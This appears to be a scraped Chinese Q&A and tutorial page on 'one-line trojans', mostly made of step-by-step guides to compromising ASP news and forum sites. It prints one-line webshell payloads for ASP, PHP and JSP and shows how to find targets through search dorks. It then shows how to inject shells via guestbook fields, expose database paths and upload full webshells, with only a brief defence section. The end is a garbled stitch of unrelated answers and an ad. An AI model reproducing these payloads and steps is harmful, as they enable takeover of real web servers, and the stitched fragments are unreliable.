什么是一句话木马
一句话木马就是在asp文件插入类似于这样的代码""execute函数允许执行任意asp代码
在客户端写一个表单
中的nneeenn必须一致--%>
把上面的代码保存成mm.html
打开
在里面输入你要执行的asp代码
点击发送
这时 你写的asp 代码就在远程执行了
而那个asp代码可以是个小木马
有点耐心:木马病毒源自古希腊特洛伊战争中著名的“木马计”而得名,顾名思义就是一种伪装潜伏的网络病毒,等待时机成熟就出来害人。
传染方式:通过电子邮件附件发出,捆绑在其他的程序中。
病毒特性:会修改注册表、驻留内存、在系统中安装后门程序、开机加载附带的木马。
木马病毒的破坏性:木马病毒的发作要在用户的机器里运行客户端程序,一旦发作,就可设置后门,定时地发送该用户的隐私到木马程序指定的地址,一般同时内置可进入该用户电脑的端口,并可任意控制此计算机,进行文件删除、拷贝、改密码等非法操作。
防范措施:用户提高警惕,不下载和运行来历不明的程序,对于不明来历的邮件附件也不要随意打开。
实例一:“一句话木马”入侵“EASYNEWS新闻管理系统”
“EASYNEWS新闻管理系统 v1.01 正式版”是在企业网站中非常常见的一套整站模版,在该网站系统的留言本组件中就存在着数据过滤不严漏洞,如果网站是默认路径和默认文件名安装的话,入侵者可以利用该漏洞直接上传ASP木马程序控制整个网站服务器。
Step1 搜索入侵目标
使用了“EASYNEWS新闻管理系统 v1.01 正式版”的网站,在网站页面的底部版权声明处,往往会有关键字符为“www.****.COM 版权所有”。只要在GOOGLE或百度中以该字符串为关键词进行搜索,就可以找到大量的入侵目标。
Step2 检测入侵条件
在这里,我们以网站“http://www.****.com/news/index.htm”为例进行一次入侵检测。“EASYNEWS新闻管理系统”网站的留言本数据库文件默认是位于“\ebook\db\ebook.asp”,首先在浏览器地址栏中输入“http://www.****.com/news/ebook/db/ebook.asp”,回车后在浏览器页面中将显示访问留言本数据库文件的返回信息。如果在页面中显示乱码,则说明该网站的留言本数据库文件没有改名,可以进行入侵。
Step3 在数据库中插入ASP后门
前面提到了该新闻系统的留言本插件存在过滤不严,因此我们可以通过提交发言,在数据库中插入“一句话木马”服务端代码:
在浏览器中访问“http://www.****.com/news/khly.htm”,打开提交留言页面。在提交页面中的“主页”栏中,直接填写“一句话木马”服务端代码,其它随便填写。确定后点击“发表留言”按钮,文章发表成功后,即可将“一句话木马”服务端代码插入到留言本数据库中了。
Step4 连接后门上传Webshell
由于留言本数据库文件“ebook.asp”是一个ASP文件,所以我们插入到数据库文件中的ASP语句将会被执行。将“一句话木马”客户端中的提交地址改为留言本数据库文件地址,然后用浏览器打开客户端,在上方的输入框中输入上传ASP木马的保存路径,在下面的输入框中可以粘贴入其它的ASP木马代码,这里选择的是桂林老兵网站管理助手ASP代码。点击提交按钮后,刚才粘贴的ASP木马将被写入到论坛服务器中保存。
Step5 打开WEBSHELL
上传的ASP木马被保存到与数据库文件同一WEB目录下,文件名为“temp.asp”,因此我们在IE浏览器中打开页面“http://www.****.com/news/ebook/db/temp.asp”,输入默认的密码“gxgl.com”,就可以看到一个WEBSHELL了。
在Webshell中可以上传其它的文件或者安装木马后门、执行各种命令等,网站的服务器已经掌握在我们的手中,可以为所欲为了。
实例二 “社区超市”入侵动网论坛
Step1 检测入侵条件
以入侵论坛“http://www.****.com/”为例。首先在浏览器地址栏中输入“http://www.****.com/data/shop.asp”,回车后在浏览器页面中将显示访问"shop.asp"文件的返回信息。说明该论坛的社区超市数据库文件没有改名或删除,可以进行入侵。
Step2 在数据库中插入ASP后门
登录论坛后,点击页面中的“娱乐”→“社区超市”,打开社区超市页面。在该页面中选择商店申请,打开“商店申请入驻”页面“http://www.****.com/z_shop_newshop.asp”,在页面中填写任意信息,注意在“商店招牌”栏中,添加刚才的ASP代码"〈%execute request("l")%〉"。确定后点击“申请”按钮进行提交,即可将ASP代码保存在数据库文件中了。
后面的步骤就与上面介绍的一样了,只需要用蓝屏木马连接数据库文件“http://sdoygb.w2.****.net/data/shop.asp”,然后上传WEBSHELL就可以控制论坛服务器了。
实例三 “一句话木马”入侵未知网站
从上面的两个例子,我们可以看出利用“一句话木马”入侵控制存在数据库过滤不严漏洞的网站,成功的前提是一定要知道网站的数据库地址。对于一些使用了未知网页程序的网站,我们如何才能找到它的数据库地址呢?这就要结合暴库或者跨站之类的方法了,下面只是结合一个简单的暴库,介绍一下利用一句话木马入侵未知网站的方法。
Step1 暴库得到数据库路径
以“http://bbs.****.com”为例。在浏览器中打开“http://bbs.****.com/join/listall.asp?bid=2”,将地址栏中join后的/改为%5c,在提交后的返回返回信息中可以看到网站数据库地址:“’d:\wwwroot\shuilong\wwwroot\admin\adshuilonG!#).asp’”,数据库文件名中加入了“#”符号,“#”符号在IE中执行时被解释为中断符,要访问该数据库文件则必须将“#”号变为“23%”才可以。因此数据库文件的实际WEB地址为“http://bbs.****.com/join/admin/adshuilonG!%23).asp”
Step2 注册网站,插入“一句话木马”
由于数据库文件是ASP文件格式的,满足入侵条件,因此现在我们需要将“一句话木马”插入到数据库文件中去。
在网页上点击注册网站按钮,打开注册链接“http://bbs.****.com/join/add.asp过滤了=step3&bid=3”,在资料填写页面处的站点名称或地址中写入“一句话木马”服务端代码,其它随便填写。然后点击完成按钮提交数据,木马服务端就被插入到数据库文件中了。
最后只需要用蓝屏木马连接数据库文件“http://bbs.****.com/join/admin/adshuilonG!%23).asp”,然后上传ASP木马就可以控制该网站的服务器了。
“一句话木马”的防范
要防范“一句话木马”可以从两方面进行,首先是要隐藏网站的数据库,不要让攻击者知道数据库文件的链接地址。这就需要管理员在网页程序中查被暴库漏洞,在数据库连接文件中加入容错代码等,具体的防暴库方法在这里就不作过多的讲解了。
其次就是要防止用户提交的数据未过滤漏洞,对用户提交的数据进行过滤,替换一些危险的代码等。例如中国站长联盟网站在出现该漏洞后已经对网页程序进行的修补,插入的ASP代码中的〈、〉和"等字符会被网页程序转换成其它字符,致使服务端代码无法正常执行。
只要作好这两方面的安全工作,“一句话木马”虽然无孔不入,但是面对这样的网站系统也是无可奈何的了。
一句话木马其实不算是真正的木马,只是利用一句话给你的网站开个口子,然后黑客利用那个口子传送木马代码.
只是利用一句话给你的网站开个口子,然后黑客利用那个口子传送木马代码.
漏洞,,后门
怎么``你还想用用`来害下人啊
php一句话木马怎么用
如果没有执行权限的话,你就算上传上去了也是没有用的。你只有想办法把木门上传到其他能执行的目录才行。一句话木马的话,就是<?php eval ($_POST[val]); ?> eval函数的功能就是把传入的值当成程序来执行。
一句话木马该怎么实现?现在就带你了解
一句话木马的实现方法介绍 Java中,传统的一句话木马通常依赖于defineClass技术,但存在Payload过大和修改不便的问题。本文介绍了一种新型的实现方式,即利用Java的JS引擎。其基本原理是利用Java的ScriptEngineManager类调用JavaScript的eval函数,通过在Payload中反转调用Java对象,实现跨语言的交互。ScriptEngine...
一句话木马的原理是什么
木马就是连接我们自己的机子和我们需要的机子之间的中间人。。。就这样
一句话木马有什么样的危害?危害有多大?
您好:一句话木马病毒一般是损坏系统文件为主的,如果您的电脑中了一句话木马病毒的话,建议您使用腾讯电脑管家的闪电杀毒功能对您的电脑杀毒,腾讯电脑管家是采用“4+1”核“芯”杀毒引擎的专业杀毒软件,杀毒能力很强大,是完全可以帮助您查杀干净电脑中的病毒的,您可以点击这里下载最新版的腾讯电脑管家...
怎么查一句话木马
一句话木马多出现于php网站,通过留言板、评论区等插入。此类问题多是管理员对自定义区的特殊代码过滤不严格。一般论坛要严格过滤用户提交<、?、"、&等英文状态的符号及其16进制转义符。还有上传图片时检查,防止扩展名不匹配。还有表单变量。。。
渗透干货|史上最全一句话木马
史上最全一句话木马的渗透技巧汇总:PHP中,一句可执行命令的代码示例:\/\/可执行命令一句话,其中过狗版本(phpv9)可用于获取shell权限。ASP同样支持,如asp 一句话,但ASPX版本的效果不如ASP,尽管大部分情况支持,如aspx 百分之8\/90支持asp。JSP中,过护卫神的代码是:<%E=request(“1”)%>abc,...
一句话木马使用方法
要使用一句话木马,首先,你需要寻找一个采用ASP格式的网站,比如其中包含留言板或发表文章功能的板块。你的目标是巧妙地将一句话插入到这个数据库中。方法可以多样化,比如通过留言或者发布文章的形式,将包含恶意代码的文本提交上去。关键是要确保这个代码片段能够被执行,无论通过何种方式实现。完成这一步骤...
一句话木马饶过过滤
不能绕过过滤的,因为这个技术是很老很老的技术了,我印象中这个一句话木马在六七年前就有了 现在的数据库都已经过滤特殊字符了,所以这类的现在已经失效 退一步讲,就算能过去,这么简单的木马代码,也逃不过安软的查杀的 只要对方的服务器上面安装有腾讯电脑管家这类的云安软,你的木马没有存活的...
请问“一句话木马”的英文是什么?急急~~~
一句话木马的英文是:Word Trojan,很高兴为你服务 参考资料:http:\/\/translate.google.cn\/#
一句话木马具体插入页眉和页脚的那个便签里面呀
1、不太懂你的意思。建议你再详细描述一下你的问题。2、好用的便签软件,向你推荐云便签。3、因为云便签的功能完善、界面简洁美观,挺好用的!另外,它还支持便签内容在Windows电脑、安卓手机、苹果iPhone手机、iPad、苹果电脑Mac端以及网页端实时同步并提醒。
蒋纯理舒: 盗你账号的
隆安县18626488823: 电脑常识:一句话木马 的定义是??
蒋纯理舒: 危害电脑网络,损害网民财产
隆安县18626488823: 一句话木马是什么? - ?
蒋纯理舒: 当知道了数据库的URL,就可以利用本地一张网页进行连接得到Webshell.(不知道数据库也可以,只要知道这就被称为一句话木马,它是基于B/S结构的.使用方法
隆安县18626488823: 什么是一句话木马??
蒋纯理舒: 应当指的是ASP一句话木马 吧?还有ASPX的,就是通过一个特殊的语句,本题提交信息给服务器运行
隆安县18626488823: 一句话木马怎么用,原理是什么? - ?
蒋纯理舒: 一句话木马就是在asp文件插入类似于这样的代码"<%execute request("nneeenn")%>"execute函数允许执行任意asp代码 在客户端写一个表单<form action="你挂马的页面" method="post"><input type="text" name="nneeenn" ...
隆安县18626488823: 一句话木马跟ASP木马分别是什么?(高分) - ?
蒋纯理舒: 一句话木马就是往一些ASp文件插入类似于这样的代码"<%execute request("value")%>"execute函数允许执行任意命令,通过客户端连接可以上传大的ASP木马,其隐秘性强,不易杀毒软件发现.ASP木马的体积较大,难免杀,但用起来方便.例子吗,”常用ASP木马集”这个软件集合一句话木马客户端和大的ASP木马,自己可以用baidu搜一下把
隆安县18626488823: 什么是一句话木马.什么又是ASP大马 - ?
蒋纯理舒: 一句话是ASP马的一种 ASP马分俩种 大马 小马 小马用来辅助上传大马直至拿到WEBSHELL
隆安县18626488823: 一句话木马的原理是什么 - ?
蒋纯理舒: 木马就是连接我们自己的机子和我们需要的机子之间的中间人...就这样
隆安县18626488823: 谁来用通俗一点的语言解释下“一句话木马”?
蒋纯理舒: 一句话木马 是指最简单的编程语言 编程的最小的木马 也就是那个木马比较小 通俗的说就是几句话编程的木马
